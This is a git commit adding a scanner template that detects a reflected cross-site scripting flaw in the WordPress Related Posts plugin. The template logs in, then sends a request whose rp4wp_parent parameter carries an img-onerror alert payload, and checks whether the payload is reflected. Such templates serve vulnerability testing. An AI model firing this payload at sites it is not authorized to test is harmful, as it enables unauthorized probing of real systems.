Merge pull request #6159 from arafatansari/patch-112

Create wp-related-post-xss
2022-12-01 12:53:45 +05:30 · 2022-12-01 12:53:45 +05:30 · a7dfed84ef
parent 3d7727605c 46dcb9ee92
commit a7dfed84ef
1 changed files with 46 additions and 0 deletions
--- a/vulnerabilities/wordpress/wp-related-post-xss
+++ b/vulnerabilities/wordpress/wp-related-post-xss
@ -0,0 +1,46 @@
+id: wp-related-post-xss
+
+info:
+  name: WordPress Related Posts <= 2.1.1 - Cross Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    WordPress Related Posts plugin before 2.1.1 contains an Reflected XSS via rp4wp_parent
+  reference:
+    - https://huntr.dev/bounties/7c9bd2d2-2a6f-420c-a45e-716600cf810e/
+    - https://wordpress.org/plugins/wordpress-23-related-posts-plugin/advanced/
+  metadata:
+    verified: true
+  tags: wordpress,wp,wp-plugin,xss,relatedposts,authenticated
+
+requests:
+  - raw: 
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+       
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src=x onerror=alert(document.domain)>&action=edit'
+          - 'All Posts</a>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200